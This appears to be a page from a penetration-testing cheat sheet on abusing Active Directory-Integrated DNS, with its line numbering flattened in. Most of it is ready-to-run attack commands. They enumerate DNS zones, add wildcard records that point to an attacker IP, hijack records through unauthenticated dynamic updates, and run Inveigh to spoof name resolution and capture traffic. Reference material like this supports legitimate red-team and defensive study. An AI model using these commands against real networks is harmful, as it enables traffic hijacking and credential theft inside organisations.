ad-integrated-dns.md (3397B)
1 --- 2 title: "Active Directory - Integrated DNS - ADIDNS" 3 section: "Active Directory" 4 sectionSlug: "active-directory" 5 sourcePath: "docs/active-directory/ad-integrated-dns.md" 6 sourceUrl: "https://github.com/swisskyrepo/InternalAllTheThings/blob/203bb0c0b290/docs/active-directory/ad-integrated-dns.md" 7 sha: "203bb0c0b290" 8 isIndex: false 9 --- 10 11 # Active Directory - Integrated DNS - ADIDNS 12 13 ADIDNS zone DACL (Discretionary Access Control List) enables regular users to create child objects by default, attackers can leverage that and hijack traffic. Active Directory will need some time (~180 seconds) to sync LDAP changes via its DNS dynamic updates protocol. 14 15 ## LDAP-Based (Require authentication) 16 17 * Enumerate all records 18 19 ```ps1 20 adidnsdump -u DOMAIN\\user --print-zones dc.domain.corp (--dns-tcp) 21 # or 22 bloodyAD --host 10.10.10.10 -d example.lab -u username -p pass123 get dnsDump 23 ``` 24 25 * Query a node 26 27 ```ps1 28 dnstool.py -u 'DOMAIN\user' -p 'password' --record '*' --action query $DomainController (--legacy) 29 # or 30 bloodyAD -u john.doe -p 'Password123!' --host 192.168.100.1 -d bloody.lab get search --base 'DC=DomainDnsZones,DC=bloody,DC=lab' --filter '(&(name=allmightyDC)(objectClass=dnsNode))' --attr dnsRecord 31 ``` 32 33 * Add a node and attach a record 34 35 ```ps1 36 dnstool.py -u 'DOMAIN\user' -p 'password' --record '*' --action add --data $AttackerIP $DomainController 37 # or 38 bloodyAD --host 10.10.10.10 -d example.lab -u username -p pass123 add dnsRecord dc1.example.lab <Attacker IP> 39 40 bloodyAD --host 10.10.10.10 -d example.lab -u username -p pass123 remove dnsRecord dc1.example.lab <Attacker IP> 41 ``` 42 43 The common way to abuse ADIDNS is to set a wildcard record and then passively listen to the network. 44 45 ```ps1 46 Invoke-Inveigh -ConsoleOutput Y -ADIDNS combo,ns,wildcard -ADIDNSThreshold 3 -LLMNR Y -NBNS Y -mDNS Y -Challenge 1122334455667788 -MachineAccounts Y 47 ``` 48 49 ## Dynamic Updates (Doesn't require authentication) 50 51 Dynamic DNS (RFC 2136) allows using the DNS protocol to update DNS records: 52 53 1. If the zone is set to Secure Only, you need a valid Kerberos ticket. 54 55 2. If the zone is set to Nonsecure and Secure, anyone on the network can send updates. 56 57 Update a record: 58 59 ```ps1 60 # Linux 61 cat << EOF > dnsupdate.txt 62 server dc.domain.corp 63 zone domain.corp 64 update delete test.domain.corp A 65 update add test.domain.corp 3600 A 10.10.10.123 66 send 67 EOF 68 69 nsupdate dnsupdate.txt 70 71 # Windows 72 Invoke-DNSupdate -DNSType A -DNSName test -DNSData 192.168.125.100 -Verbose 73 ``` 74 75 ## DNS Reconnaissance 76 77 Perform **ADIDNS** searches 78 79 ```powershell 80 StandIn.exe --dns --limit 20 81 StandIn.exe --dns --filter SQL --limit 10 82 StandIn.exe --dns --forest --domain <domain> --user <username> --pass <password> 83 StandIn.exe --dns --legacy --domain <domain> --user <username> --pass <password> 84 ``` 85 86 ## References 87 88 * [Getting in the Zone: dumping Active Directory DNS using adidnsdump - Dirk-jan Mollema](https://blog.fox-it.com/2019/04/25/getting-in-the-zone-dumping-active-directory-dns-using-adidnsdump/) 89 * [ADIDNS Revisited – WPAD, GQBL, and More - December 5, 2018 | Kevin Robertson](https://www.netspi.com/blog/technical/network-penetration-testing/adidns-revisited/) 90 * [Beyond LLMNR/NBNS Spoofing – Exploiting Active Directory-Integrated DNS - July 10, 2018 | Kevin Robertson](https://www.netspi.com/blog/technical/network-penetration-testing/exploiting-adidns/)